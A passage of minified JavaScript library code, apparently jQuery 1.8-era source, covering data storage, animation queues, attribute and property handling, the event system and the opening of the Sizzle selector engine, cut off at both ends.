l=this.triggerHandler("getData"+i,[r[0]]),l===t&&a&&(l=v.data(a,e),l=H(a,e,l)),l===t&&r[1]?this.data(r[0]):l;r[1]=n,this.each(function(){var t=v(this);t.triggerHandler("setData"+i,r),v.data(this,e,n),t.triggerHandler("changeData"+i,r)})},null,n,arguments.length>1,null,!1))},removeData:function(e){return this.each(function(){v.removeData(this,e)})}}),v.extend({queue:function(e,t,n){var r;if(e)return t=(t||"fx")+"queue",r=v._data(e,t),n&&(!r||v.isArray(n)?r=v._data(e,t,v.makeArray(n)):r.push(n)),r||[]},dequeue:function(e,t){t=t||"fx";var n=v.queue(e,t),r=n.length,i=n.shift(),s=v._queueHooks(e,t),o=function(){v.dequeue(e,t)};i==="inprogress"&&(i=n.shift(),r--),i&&(t==="fx"&&n.unshift("inprogress"),delete s.stop,i.call(e,o,s)),!r&&s&&s.empty.fire()},_queueHooks:function(e,t){var n=t+"queueHooks";return v._data(e,n)||v._data(e,n,{empty:v.Callbacks("once memory").add(function(){v.removeData(e,t+"queue",!0),v.removeData(e,n,!0)})})}}),v.fn.extend({queue:function(e,n){var r=2;return typeof e!="string"&&(n=e,e="fx",r--),arguments.length<r?v.queue(this[0],e):n===t?this:this.each(function(){var t=v.queue(this,e,n);v._queueHooks(this,e),e==="fx"&&t[0]!=="inprogress"&&v.dequeue(this,e)})},dequeue:function(e){return this.each(function(){v.dequeue(this,e)})},delay:function(e,t){return e=v.fx?v.fx.speeds[e]||e:e,t=t||"fx",this.queue(t,function(t,n){var r=setTimeout(t,e);n.stop=function(){clearTimeout(r)}})},clearQueue:function(e){return this.queue(e||"fx",[])},promise:function(e,n){var r,i=1,s=v.Deferred(),o=this,u=this.length,a=function(){--i||s.resolveWith(o,[o])};typeof e!="string"&&(n=e,e=t),e=e||"fx";while(u--)r=v._data(o[u],e+"queueHooks"),r&&r.empty&&(i++,r.empty.add(a));return a(),s.promise(n)}});var j,F,I,q=/[\t\r\n]/g,R=/\r/g,U=/^(?:button|input)$/i,z=/^(?:button|input|object|select|textarea)$/i,W=/^a(?:rea|)$/i,X=/^(?:autofocus|autoplay|async|checked|controls|defer|disabled|hidden|loop|multiple|open|readonly|required|scoped|selected)$/i,V=v.support.getSetAttribute;v.fn.extend({attr:function(e,t){return v.access(this,v.attr,e,t,arguments.length>1)},removeAttr:function(e){return this.each(function(){v.removeAttr(this,e)})},prop:function(e,t){return v.access(this,v.prop,e,t,arguments.length>1)},removeProp:function(e){return e=v.propFix[e]||e,this.each(function(){try{this[e]=t,delete this[e]}catch(n){}})},addClass:function(e){var t,n,r,i,s,o,u;if(v.isFunction(e))return this.each(function(t){v(this).addClass(e.call(this,t,this.className))});if(e&&typeof e=="string"){t=e.split(y);for(n=0,r=this.length;n<r;n++){i=this[n];if(i.nodeType===1)if(!i.className&&t.length===1)i.className=e;else{s=" "+i.className+" ";for(o=0,u=t.length;o<u;o++)s.indexOf(" "+t[o]+" ")<0&&(s+=t[o]+" ");i.className=v.trim(s)}}}return this},removeClass:function(e){var n,r,i,s,o,u,a;if(v.isFunction(e))return this.each(function(t){v(this).removeClass(e.call(this,t,this.className))});if(e&&typeof e=="string"||e===t){n=(e||"").split(y);for(u=0,a=this.length;u<a;u++){i=this[u];if(i.nodeType===1&&i.className){r=(" "+i.className+" ").replace(q," ");for(s=0,o=n.length;s<o;s++)while(r.indexOf(" "+n[s]+" ")>=0)r=r.replace(" "+n[s]+" "," ");i.className=e?v.trim(r):""}}}return this},toggleClass:function(e,t){var n=typeof e,r=typeof t=="boolean";return v.isFunction(e)?this.each(function(n){v(this).toggleClass(e.call(this,n,this.className,t),t)}):this.each(function(){if(n==="string"){var i,s=0,o=v(this),u=t,a=e.split(y);while(i=a[s++])u=r?u:!o.hasClass(i),o[u?"addClass":"removeClass"](i)}else if(n==="undefined"||n==="boolean")this.className&&v._data(this,"__className__",this.className),this.className=this.className||e===!1?"":v._data(this,"__className__")||""})},hasClass:function(e){var t=" "+e+" ",n=0,r=this.length;for(;n<r;n++)if(this[n].nodeType===1&&(" "+this[n].className+" ").replace(q," ").indexOf(t)>=0)return!0;return!1},val:function(e){var n,r,i,s=this[0];if(!arguments.length){if(s)return n=v.valHooks[s.type]||v.valHooks[s.nodeName.toLowerCase()],n&&"get"in n&&(r=n.get(s,"value"))!==t?r:(r=s.value,typeof r=="string"?r.replace(R,""):r==null?"":r);return}return i=v.isFunction(e),this.each(function(r){var s,o=v(this);if(this.nodeType!==1)return;i?s=e.call(this,r,o.val()):s=e,s==null?s="":typeof s=="number"?s+="":v.isArray(s)&&(s=v.map(s,function(e){return e==null?"":e+""})),n=v.valHooks[this.type]||v.valHooks[this.nodeName.toLowerCase()];if(!n||!("set"in n)||n.set(this,s,"value")===t)this.value=s})}}),v.extend({valHooks:{option:{get:function(e){var t=e.attributes.value;return!t||t.specified?e.value:e.text}},select:{get:function(e){var t,n,r=e.options,i=e.selectedIndex,s=e.type==="select-one"||i<0,o=s?null:[],u=s?i+1:r.length,a=i<0?u:s?i:0;for(;a<u;a++){n=r[a];if((n.selected||a===i)&&(v.support.optDisabled?!n.disabled:n.getAttribute("disabled")===null)&&(!n.parentNode.disabled||!v.nodeName(n.parentNode,"optgroup"))){t=v(n).val();if(s)return t;o.push(t)}}return o},set:function(e,t){var n=v.makeArray(t);return v(e).find("option").each(function(){this.selected=v.inArray(v(this).val(),n)>=0}),n.length||(e.selectedIndex=-1),n}}},attrFn:{},attr:function(e,n,r,i){var s,o,u,a=e.nodeType;if(!e||a===3||a===8||a===2)return;if(i&&v.isFunction(v.fn[n]))return v(e)[n](r);if(typeof e.getAttribute=="undefined")return v.prop(e,n,r);u=a!==1||!v.isXMLDoc(e),u&&(n=n.toLowerCase(),o=v.attrHooks[n]||(X.test(n)?F:j));if(r!==t){if(r===null){v.removeAttr(e,n);return}return o&&"set"in o&&u&&(s=o.set(e,r,n))!==t?s:(e.setAttribute(n,r+""),r)}return o&&"get"in o&&u&&(s=o.get(e,n))!==null?s:(s=e.getAttribute(n),s===null?t:s)},removeAttr:function(e,t){var n,r,i,s,o=0;if(t&&e.nodeType===1){r=t.split(y);for(;o<r.length;o++)i=r[o],i&&(n=v.propFix[i]||i,s=X.test(i),s||v.attr(e,i,""),e.removeAttribute(V?i:n),s&&n in e&&(e[n]=!1))}},attrHooks:{type:{set:function(e,t){if(U.test(e.nodeName)&&e.parentNode)v.error("type property can't be changed");else if(!v.support.radioValue&&t==="radio"&&v.nodeName(e,"input")){var n=e.value;return e.setAttribute("type",t),n&&(e.value=n),t}}},value:{get:function(e,t){return j&&v.nodeName(e,"button")?j.get(e,t):t in e?e.value:null},set:function(e,t,n){if(j&&v.nodeName(e,"button"))return j.set(e,t,n);e.value=t}}},propFix:{tabindex:"tabIndex",readonly:"readOnly","for":"htmlFor","class":"className",maxlength:"maxLength",cellspacing:"cellSpacing",cellpadding:"cellPadding",rowspan:"rowSpan",colspan:"colSpan",usemap:"useMap",frameborder:"frameBorder",contenteditable:"contentEditable"},prop:function(e,n,r){var i,s,o,u=e.nodeType;if(!e||u===3||u===8||u===2)return;return o=u!==1||!v.isXMLDoc(e),o&&(n=v.propFix[n]||n,s=v.propHooks[n]),r!==t?s&&"set"in s&&(i=s.set(e,r,n))!==t?i:e[n]=r:s&&"get"in s&&(i=s.get(e,n))!==null?i:e[n]},propHooks:{tabIndex:{get:function(e){var n=e.getAttributeNode("tabindex");return n&&n.specified?parseInt(n.value,10):z.test(e.nodeName)||W.test(e.nodeName)&&e.href?0:t}}}}),F={get:function(e,n){var r,i=v.prop(e,n);return i===!0||typeof i!="boolean"&&(r=e.getAttributeNode(n))&&r.nodeValue!==!1?n.toLowerCase():t},set:function(e,t,n){var r;return t===!1?v.removeAttr(e,n):(r=v.propFix[n]||n,r in e&&(e[r]=!0),e.setAttribute(n,n.toLowerCase())),n}},V||(I={name:!0,id:!0,coords:!0},j=v.valHooks.button={get:function(e,n){var r;return r=e.getAttributeNode(n),r&&(I[n]?r.value!=="":r.specified)?r.value:t},set:function(e,t,n){var r=e.getAttributeNode(n);return r||(r=i.createAttribute(n),e.setAttributeNode(r)),r.value=t+""}},v.each(["width","height"],function(e,t){v.attrHooks[t]=v.extend(v.attrHooks[t],{set:function(e,n){if(n==="")return e.setAttribute(t,"auto"),n}})}),v.attrHooks.contenteditable={get:j.get,set:function(e,t,n){t===""&&(t="false"),j.set(e,t,n)}}),v.support.hrefNormalized||v.each(["href","src","width","height"],function(e,n){v.attrHooks[n]=v.extend(v.attrHooks[n],{get:function(e){var r=e.getAttribute(n,2);return r===null?t:r}})}),v.support.style||(v.attrHooks.style={get:function(e){return e.style.cssText.toLowerCase()||t},set:function(e,t){return e.style.cssText=t+""}}),v.support.optSelected||(v.propHooks.selected=v.extend(v.propHooks.selected,{get:function(e){var t=e.parentNode;return t&&(t.selectedIndex,t.parentNode&&t.parentNode.selectedIndex),null}})),v.support.enctype||(v.propFix.enctype="encoding"),v.support.checkOn||v.each(["radio","checkbox"],function(){v.valHooks[this]={get:function(e){return e.getAttribute("value")===null?"on":e.value}}}),v.each(["radio","checkbox"],function(){v.valHooks[this]=v.extend(v.valHooks[this],{set:function(e,t){if(v.isArray(t))return e.checked=v.inArray(v(e).val(),t)>=0}})});var $=/^(?:textarea|input|select)$/i,J=/^([^\.]*|)(?:\.(.+)|)$/,K=/(?:^|\s)hover(\.\S+|)\b/,Q=/^key/,G=/^(?:mouse|contextmenu)|click/,Y=/^(?:focusinfocus|focusoutblur)$/,Z=function(e){return v.event.special.hover?e:e.replace(K,"mouseenter$1 mouseleave$1")};v.event={add:function(e,n,r,i,s){var o,u,a,f,l,c,h,p,d,m,g;if(e.nodeType===3||e.nodeType===8||!n||!r||!(o=v._data(e)))return;r.handler&&(d=r,r=d.handler,s=d.selector),r.guid||(r.guid=v.guid++),a=o.events,a||(o.events=a={}),u=o.handle,u||(o.handle=u=function(e){return typeof v=="undefined"||!!e&&v.event.triggered===e.type?t:v.event.dispatch.apply(u.elem,arguments)},u.elem=e),n=v.trim(Z(n)).split(" ");for(f=0;f<n.length;f++){l=J.exec(n[f])||[],c=l[1],h=(l[2]||"").split(".").sort(),g=v.event.special[c]||{},c=(s?g.delegateType:g.bindType)||c,g=v.event.special[c]||{},p=v.extend({type:c,origType:l[1],data:i,handler:r,guid:r.guid,selector:s,needsContext:s&&v.expr.match.needsContext.test(s),namespace:h.join(".")},d),m=a[c];if(!m){m=a[c]=[],m.delegateCount=0;if(!g.setup||g.setup.call(e,i,h,u)===!1)e.addEventListener?e.addEventListener(c,u,!1):e.attachEvent&&e.attachEvent("on"+c,u)}g.add&&(g.add.call(e,p),p.handler.guid||(p.handler.guid=r.guid)),s?m.splice(m.delegateCount++,0,p):m.push(p),v.event.global[c]=!0}e=null},global:{},remove:function(e,t,n,r,i){var s,o,u,a,f,l,c,h,p,d,m,g=v.hasData(e)&&v._data(e);if(!g||!(h=g.events))return;t=v.trim(Z(t||"")).split(" ");for(s=0;s<t.length;s++){o=J.exec(t[s])||[],u=a=o[1],f=o[2];if(!u){for(u in h)v.event.remove(e,u+t[s],n,r,!0);continue}p=v.event.special[u]||{},u=(r?p.delegateType:p.bindType)||u,d=h[u]||[],l=d.length,f=f?new RegExp("(^|\\.)"+f.split(".").sort().join("\\.(?:.*\\.|)")+"(\\.|$)"):null;for(c=0;c<d.length;c++)m=d[c],(i||a===m.origType)&&(!n||n.guid===m.guid)&&(!f||f.test(m.namespace))&&(!r||r===m.selector||r==="**"&&m.selector)&&(d.splice(c--,1),m.selector&&d.delegateCount--,p.remove&&p.remove.call(e,m));d.length===0&&l!==d.length&&((!p.teardown||p.teardown.call(e,f,g.handle)===!1)&&v.removeEvent(e,u,g.handle),delete h[u])}v.isEmptyObject(h)&&(delete g.handle,v.removeData(e,"events",!0))},customEvent:{getData:!0,setData:!0,changeData:!0},trigger:function(n,r,s,o){if(!s||s.nodeType!==3&&s.nodeType!==8){var u,a,f,l,c,h,p,d,m,g,y=n.type||n,b=[];if(Y.test(y+v.event.triggered))return;y.indexOf("!")>=0&&(y=y.slice(0,-1),a=!0),y.indexOf(".")>=0&&(b=y.split("."),y=b.shift(),b.sort());if((!s||v.event.customEvent[y])&&!v.event.global[y])return;n=typeof n=="object"?n[v.expando]?n:new v.Event(y,n):new v.Event(y),n.type=y,n.isTrigger=!0,n.exclusive=a,n.namespace=b.join("."),n.namespace_re=n.namespace?new RegExp("(^|\\.)"+b.join("\\.(?:.*\\.|)")+"(\\.|$)"):null,h=y.indexOf(":")<0?"on"+y:"";if(!s){u=v.cache;for(f in u)u[f].events&&u[f].events[y]&&v.event.trigger(n,r,u[f].handle.elem,!0);return}n.result=t,n.target||(n.target=s),r=r!=null?v.makeArray(r):[],r.unshift(n),p=v.event.special[y]||{};if(p.trigger&&p.trigger.apply(s,r)===!1)return;m=[[s,p.bindType||y]];if(!o&&!p.noBubble&&!v.isWindow(s)){g=p.delegateType||y,l=Y.test(g+y)?s:s.parentNode;for(c=s;l;l=l.parentNode)m.push([l,g]),c=l;c===(s.ownerDocument||i)&&m.push([c.defaultView||c.parentWindow||e,g])}for(f=0;f<m.length&&!n.isPropagationStopped();f++)l=m[f][0],n.type=m[f][1],d=(v._data(l,"events")||{})[n.type]&&v._data(l,"handle"),d&&d.apply(l,r),d=h&&l[h],d&&v.acceptData(l)&&d.apply&&d.apply(l,r)===!1&&n.preventDefault();return n.type=y,!o&&!n.isDefaultPrevented()&&(!p._default||p._default.apply(s.ownerDocument,r)===!1)&&(y!=="click"||!v.nodeName(s,"a"))&&v.acceptData(s)&&h&&s[y]&&(y!=="focus"&&y!=="blur"||n.target.offsetWidth!==0)&&!v.isWindow(s)&&(c=s[h],c&&(s[h]=null),v.event.triggered=y,s[y](),v.event.triggered=t,c&&(s[h]=c)),n.result}return},dispatch:function(n){n=v.event.fix(n||e.event);var r,i,s,o,u,a,f,c,h,p,d=(v._data(this,"events")||{})[n.type]||[],m=d.delegateCount,g=l.call(arguments),y=!n.exclusive&&!n.namespace,b=v.event.special[n.type]||{},w=[];g[0]=n,n.delegateTarget=this;if(b.preDispatch&&b.preDispatch.call(this,n)===!1)return;if(m&&(!n.button||n.type!=="click"))for(s=n.target;s!=this;s=s.parentNode||this)if(s.disabled!==!0||n.type!=="click"){u={},f=[];for(r=0;r<m;r++)c=d[r],h=c.selector,u[h]===t&&(u[h]=c.needsContext?v(h,this).index(s)>=0:v.find(h,this,null,[s]).length),u[h]&&f.push(c);f.length&&w.push({elem:s,matches:f})}d.length>m&&w.push({elem:this,matches:d.slice(m)});for(r=0;r<w.length&&!n.isPropagationStopped();r++){a=w[r],n.currentTarget=a.elem;for(i=0;i<a.matches.length&&!n.isImmediatePropagationStopped();i++){c=a.matches[i];if(y||!n.namespace&&!c.namespace||n.namespace_re&&n.namespace_re.test(c.namespace))n.data=c.data,n.handleObj=c,o=((v.event.special[c.origType]||{}).handle||c.handler).apply(a.elem,g),o!==t&&(n.result=o,o===!1&&(n.preventDefault(),n.stopPropagation()))}}return b.postDispatch&&b.postDispatch.call(this,n),n.result},props:"attrChange attrName relatedNode srcElement altKey bubbles cancelable ctrlKey currentTarget eventPhase metaKey relatedTarget shiftKey target timeStamp view which".split(" "),fixHooks:{},keyHooks:{props:"char charCode key keyCode".split(" "),filter:function(e,t){return e.which==null&&(e.which=t.charCode!=null?t.charCode:t.keyCode),e}},mouseHooks:{props:"button buttons clientX clientY fromElement offsetX offsetY pageX pageY screenX screenY toElement".split(" "),filter:function(e,n){var r,s,o,u=n.button,a=n.fromElement;return e.pageX==null&&n.clientX!=null&&(r=e.target.ownerDocument||i,s=r.documentElement,o=r.body,e.pageX=n.clientX+(s&&s.scrollLeft||o&&o.scrollLeft||0)-(s&&s.clientLeft||o&&o.clientLeft||0),e.pageY=n.clientY+(s&&s.scrollTop||o&&o.scrollTop||0)-(s&&s.clientTop||o&&o.clientTop||0)),!e.relatedTarget&&a&&(e.relatedTarget=a===e.target?n.toElement:a),!e.which&&u!==t&&(e.which=u&1?1:u&2?3:u&4?2:0),e}},fix:function(e){if(e[v.expando])return e;var t,n,r=e,s=v.event.fixHooks[e.type]||{},o=s.props?this.props.concat(s.props):this.props;e=v.Event(r);for(t=o.length;t;)n=o[--t],e[n]=r[n];return e.target||(e.target=r.srcElement||i),e.target.nodeType===3&&(e.target=e.target.parentNode),e.metaKey=!!e.metaKey,s.filter?s.filter(e,r):e},special:{load:{noBubble:!0},focus:{delegateType:"focusin"},blur:{delegateType:"focusout"},beforeunload:{setup:function(e,t,n){v.isWindow(this)&&(this.onbeforeunload=n)},teardown:function(e,t){this.onbeforeunload===t&&(this.onbeforeunload=null)}}},simulate:function(e,t,n,r){var i=v.extend(new v.Event,n,{type:e,isSimulated:!0,originalEvent:{}});r?v.event.trigger(i,null,t):v.event.dispatch.call(t,i),i.isDefaultPrevented()&&n.preventDefault()}},v.event.handle=v.event.dispatch,v.removeEvent=i.removeEventListener?function(e,t,n){e.removeEventListener&&e.removeEventListener(t,n,!1)}:function(e,t,n){var r="on"+t;e.detachEvent&&(typeof e[r]=="undefined"&&(e[r]=null),e.detachEvent(r,n))},v.Event=function(e,t){if(!(this instanceof v.Event))return new v.Event(e,t);e&&e.type?(this.originalEvent=e,this.type=e.type,this.isDefaultPrevented=e.defaultPrevented||e.returnValue===!1||e.getPreventDefault&&e.getPreventDefault()?tt:et):this.type=e,t&&v.extend(this,t),this.timeStamp=e&&e.timeStamp||v.now(),this[v.expando]=!0},v.Event.prototype={preventDefault:function(){this.isDefaultPrevented=tt;var e=this.originalEvent;if(!e)return;e.preventDefault?e.preventDefault():e.returnValue=!1},stopPropagation:function(){this.isPropagationStopped=tt;var e=this.originalEvent;if(!e)return;e.stopPropagation&&e.stopPropagation(),e.cancelBubble=!0},stopImmediatePropagation:function(){this.isImmediatePropagationStopped=tt,this.stopPropagation()},isDefaultPrevented:et,isPropagationStopped:et,isImmediatePropagationStopped:et},v.each({mouseenter:"mouseover",mouseleave:"mouseout"},function(e,t){v.event.special[e]={delegateType:t,bindType:t,handle:function(e){var n,r=this,i=e.relatedTarget,s=e.handleObj,o=s.selector;if(!i||i!==r&&!v.contains(r,i))e.type=s.origType,n=s.handler.apply(this,arguments),e.type=t;return n}}}),v.support.submitBubbles||(v.event.special.submit={setup:function(){if(v.nodeName(this,"form"))return!1;v.event.add(this,"click._submit keypress._submit",function(e){var n=e.target,r=v.nodeName(n,"input")||v.nodeName(n,"button")?n.form:t;r&&!v._data(r,"_submit_attached")&&(v.event.add(r,"submit._submit",function(e){e._submit_bubble=!0}),v._data(r,"_submit_attached",!0))})},postDispatch:function(e){e._submit_bubble&&(delete e._submit_bubble,this.parentNode&&!e.isTrigger&&v.event.simulate("submit",this.parentNode,e,!0))},teardown:function(){if(v.nodeName(this,"form"))return!1;v.event.remove(this,"._submit")}}),v.support.changeBubbles||(v.event.special.change={setup:function(){if($.test(this.nodeName)){if(this.type==="checkbox"||this.type==="radio")v.event.add(this,"propertychange._change",function(e){e.originalEvent.propertyName==="checked"&&(this._just_changed=!0)}),v.event.add(this,"click._change",function(e){this._just_changed&&!e.isTrigger&&(this._just_changed=!1),v.event.simulate("change",this,e,!0)});return!1}v.event.add(this,"beforeactivate._change",function(e){var t=e.target;$.test(t.nodeName)&&!v._data(t,"_change_attached")&&(v.event.add(t,"change._change",function(e){this.parentNode&&!e.isSimulated&&!e.isTrigger&&v.event.simulate("change",this.parentNode,e,!0)}),v._data(t,"_change_attached",!0))})},handle:function(e){var t=e.target;if(this!==t||e.isSimulated||e.isTrigger||t.type!=="radio"&&t.type!=="checkbox")return e.handleObj.handler.apply(this,arguments)},teardown:function(){return v.event.remove(this,"._change"),!$.test(this.nodeName)}}),v.support.focusinBubbles||v.each({focus:"focusin",blur:"focusout"},function(e,t){var n=0,r=function(e){v.event.simulate(t,e.target,v.event.fix(e),!0)};v.event.special[t]={setup:function(){n++===0&&i.addEventListener(e,r,!0)},teardown:function(){--n===0&&i.removeEventListener(e,r,!0)}}}),v.fn.extend({on:function(e,n,r,i,s){var o,u;if(typeof e=="object"){typeof n!="string"&&(r=r||n,n=t);for(u in e)this.on(u,n,r,e[u],s);return this}r==null&&i==null?(i=n,r=n=t):i==null&&(typeof n=="string"?(i=r,r=t):(i=r,r=n,n=t));if(i===!1)i=et;else if(!i)return this;return s===1&&(o=i,i=function(e){return v().off(e),o.apply(this,arguments)},i.guid=o.guid||(o.guid=v.guid++)),this.each(function(){v.event.add(this,e,i,r,n)})},one:function(e,t,n,r){return this.on(e,t,n,r,1)},off:function(e,n,r){var i,s;if(e&&e.preventDefault&&e.handleObj)return i=e.handleObj,v(e.delegateTarget).off(i.namespace?i.origType+"."+i.namespace:i.origType,i.selector,i.handler),this;if(typeof e=="object"){for(s in e)this.off(s,n,e[s]);return this}if(n===!1||typeof n=="function")r=n,n=t;return r===!1&&(r=et),this.each(function(){v.event.remove(this,e,r,n)})},bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},live:function(e,t,n){return v(this.context).on(e,this.selector,t,n),this},die:function(e,t){return v(this.context).off(e,this.selector||"**",t),this},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return arguments.length===1?this.off(e,"**"):this.off(t,e||"**",n)},trigger:function(e,t){return this.each(function(){v.event.trigger(e,t,this)})},triggerHandler:function(e,t){if(this[0])return v.event.trigger(e,t,this[0],!0)},toggle:function(e){var t=arguments,n=e.guid||v.guid++,r=0,i=function(n){var i=(v._data(this,"lastToggle"+e.guid)||0)%r;return v._data(this,"lastToggle"+e.guid,i+1),n.preventDefault(),t[i].apply(this,arguments)||!1};i.guid=n;while(r<t.length)t[r++].guid=n;return this.click(i)},hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),v.each("blur focus focusin focusout load resize scroll unload click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup error contextmenu".split(" "),function(e,t){v.fn[t]=function(e,n){return n==null&&(n=e,e=null),arguments.length>0?this.on(t,null,e,n):this.trigger(t)},Q.test(t)&&(v.event.fixHooks[t]=v.event.keyHooks),G.test(t)&&(v.event.fixHooks[t]=v.event.mouseHooks)}),function(e,t){function nt(e,t,n,r){n=n||[],t=t||g;var i,s,a,f,l=t.nodeType;if(!e||typeof e!="string")return n;if(l!==1&&l!==9)return[];a=o(t);if(!a&&!r)if(i=R.exec(e))if(f=i[1]){if(l===9){s=t.getElementById(f);if(!s||!s.parentNode)return n;if(s.id===f)return n.push(s),n}else if(t.ownerDocument&&(s=t.ownerDocument.getElementById(f))&&u(t,s)&&s.id===f)return n.push(s),n}else{if(i[2])return S.apply(n,x.call(t.getElementsByTagName(e),0)),n;if((f=i[3])&&Z&&t.getElementsByClassName)return S.apply(n,x.call(t.getElementsByClassName(f),0)),n}return vt(e.replace(j,"$1"),t,n,r,a)}function rt(e){return function(t){var n=t.nodeName.toLowerCase();return n==="input"&&t.type===e}}function it(e){return function(t){var n=t.nodeName.toLowerCase();return(n==="input"||n==="button")&&t.type===e}}function st(e){return N(function(t){return t=+t,N(function(n,r){var i,s=e([],n.length,t),o=s.length;while(o--)n[i=s[o]]&&(n[i]=!(r[i]=n[i]))})})}function ot(e,t,n){if(e===t)return n;var r=e.nextSibling;while(r){if(r===t)return-1;r=r.nextSibling}return 1}function ut(e,t){var n,r,s,o,u,a,f,l=L[d][e+" "];if(l)return t?0:l.slice(0);u=e,a=[],f=i.preFilter;while(u){if(!n||(r=F.exec(u)))r&&(u=u.slice(r[0].length)||u),a.push(s=[]);n=!1;if(r=I.exec(u))s.push(n=new m(r.shift())),u=u.slice(n.length),n.type=r[0].replace(j," ");for(o in i.filter)(r=J[o].exec(u))&&(!f[o]||(r=f[o](r)))&&(s.push(n=new m(r.shift())),u=u.slice(n.length),n.type=o,n.matches=r);if(!n)break}return t?u.length:u?nt.error(e):L(e,a).slice(0)}function at(e,t,r){var i=t.dir,s=r&&t.dir==="parentNode",o=w++;return t.first?function(t,n,r){while(t=t[i])if(s||t.nodeType===1)return e(t,n,r)}:function(t,r,u){if(!u){var a,f=b+" "+o+" ",l=f+n;while(t=t[i])if(s||t.nodeType===1){if((a=t[d])===l)return t.sizset;if(typeof a=="string"&&a.indexOf(f)===0){if(t.sizset)return t}else{t[d]=l;if(e(t,r,u))return t.sizset=!0,t;t.sizset=!1}}}else while(t=t[i])if(s||t.nodeType===1)if(e(t,r,u))return t}}function ft(e){return e.length>1?function(t,n,r){var i=e.length;while(i--)if(!e[i](t,n,r))return!1;return!0}:e[0]}function lt(e,t,n,r,i){var s,o=[],u=0,a=e.length,f=t!=null;for(;u<a;u++)if(s=e[u])if(!n||n(s,r,i))o.push(s),f&&t.push(u);return o}function ct(e,t,n,r,i,s){return r&&!r[d]&&(r=ct(r)),i&&!i[d]&&(i=ct(i,s)),N(function(s,o,u,a){var f,l,c,h=[],p=[],d=o.length,v=s||dt(t||"*",u.nodeType?[u]:u,[]),m=e&&(s||!t)?lt(v,h,e,u,a):v,g=n?i||(s?e:d||r)?[]:o:m;n&&n(m,g,u,a);if(r){f=lt(g,p),r(f,[],u,a),l=f.length;while(l--)if(c=f[l])g[p[l]]=!(m[p[l]]=c)}if(s){if(i||e){if(i){f=[],l=g.length;while(l--)(c=g[l])&&f.push(m[l]=c);i(null,g=[],f,a)}l=g.length;while(l--)(c=g[l])&&(f=i?T.call(s,c):h[l])>-1&&(s[f]=!(o[f]=c))}}else g=lt(g===o?g.splice(d,g.length):g),i?i(null,o,g,a):S.apply(o,g)})}function ht(e){var t,n,r,s=e.length,o=i.relative[e[0].type],u=o||i.relative[" "],a=o?1:0,f=at(function(e){return e===t},u,!0),l=at(function(e){return T.call(t,e)>-1},u,!0),h=[function(e,n,r){return!o&&(r||n!==c)||((t=n).nodeType?f(e,n,r):l(e,n,r))}];for(;a<s;a++)if(n=i.relative[e[a].type])h=[at(ft(h),n)];else{n=i.filter[e[a].type].apply(null,e[a].matches);if(n[d]){r=++a;for(;r<s;r++)if(i.relative[e[r].type])break;return ct(a>1&&ft(h),a>1&&e.slice(0,a-1).join("").replace(j,"$1"),n,a<r&&ht(e.slice(a,r)),r<s&&ht(e=e.slice(r)),r<s&&e.join(""))}h.push(n)}return ft(h)}function pt(e,t){var r=t.length>0,s=e.length>0,o=function(u,a,f,l,h){var p,d,v,m=[],y=0,w="0",x=u&&[],T=h!=null,N=c,C=u||s&&i.find.TAG("*",h&&a.parentNode||a),k=b+=N==null?1:Math.E;T&&(c=a!==g&&a,n=o.el);for(;(p=C[w])!=null;w++){if(s&&p){for(d=0;v=e[d];d++)if(v(p,a,f)){l.push(p);break}T&&(b=k,n=++o.el)}r&&((p=!v&&p)&&y--,u&&x.push(p))}y+=w;if(r&&w!==y){for(d=0;v=t[d];d++)v(x,m,a,f);if(u){if(y>0)while(w--)!x[w]&&!m[w]&&(m[w]=E.call(l));m=lt(m)}S.apply(l,m),T&&!u&&m.length>0&&y+t.length>1&&nt.uniqueSort(l)}return T&&(b=k,c=N),x};return o.el=0,r?N(o):o}function dt(e,t,n){var r=0,i=t.length;for(;r<i;r++)nt(e,t[r],n);return n}function vt(e,t,n,r,s){var o,u,f,l,c,h=ut(e),p=h.length;if(!r&&h.length===1){u=h[0]=h[0].slice(0);if(u.length>2&&(f=u[0]).type==="ID"&&t.nodeType===9&&!s&&i.relative[u[1].type]){t=i.find.ID(f.matches[0].replace($,""),t,s)[0];if(!t)return n;e=e.slice(u.shift().length)}for(o=J.POS.test(e)?-1:u.length-1;o>=0;o--){f=u[o];if(i.relative[l=f.type])break;if(c=i.find[l])if(r=c(f.matches[0].replace($,""),z.test(u[0].type)&&t.parentNode||t,s)){u.splice(o,1),e=r.length&&u.join("");if(!e)return S.apply(n,x.call(r,0)),n;break}}}return a(e,h)(r,t,s,n,z.test(e)),n}function mt(){}var n,r,i,s,o,u,a,f,l,c,h=!0,p="undefined",d=("sizcache"+Math.random()).replace(".",""),m=String,g=e.document,y=g.documentElement,b=0,w=0,E=[].pop,S=[].push,x=[].slice,T=[].indexOf||function(e){var t=0,n=this.length;for(;t<n;t++)if(this[t]===e)return t;return-1},N=function(e,t){return e[d]=t==null||t,e},C=function(){var e={},t=[];return N(function(n,r){return t.push(n)>i.cacheLength&&delete e[t.shift()],e[n+" "]=r},e)},k=C(),L=C(),A=C(),O="[\\x20\\t\\r\\n\\f]",M="(?:\\\\.|[-\\w]|[^\\x00-\\xa0])+",_=M.replace("w","w#"),D="([*^$|!~]?=)",P="\\["+O+"*("+M+")"+O+"*(?:"+D+O+"*(?:(['\"])((?:\\\\.|[^\\\\])*?)\\3|("+_+")|)|)"+O+"*\\]",H=":("+M+")(?:\\((?:(['\"])((?:\\\\.|[^\\\\])*?)\\2|([^()[\\]]*|(?:(?:"+P+")|[^:]|\\\\.)*|.*))\\)|)",B=":(even|odd|eq|gt|lt|nth|first|last)(?:\\("+O+"*((?:-\\d)?\\d*)"+O+"*\\)|)(?=[^-]|$)",j=new RegExp("^"+O+"+|((?:^|[^\\\\])(?:\\\\.)*)"+O+"+$","g"),F=new RegExp("^"+O+"*,"+O+"*"),I=new RegExp("^"+O+"*([\\x20\\t\\r\\n\\f>+~])"+O+"*"),q=new RegExp(H),R=/^(?:#([\w\-]+)|(\w+)|\.([\w\-]+))$/,U=/^:not/,z=/[\x20\t\r\n\f]*[+~]/,W=/:not\($/,X=/h\d/i,V=/input|select|textarea|button/i,$=/\\(?!\\)/g,J={ID:new RegExp("^#("+M+")"),CLASS:new RegExp("^\\.("+M+")"),NAME:new RegExp("^\\[name=['\"]?("+M+")['\"]?\\]"),TAG:new RegExp("^("+M.replace("w","w*")+")"),ATTR:new 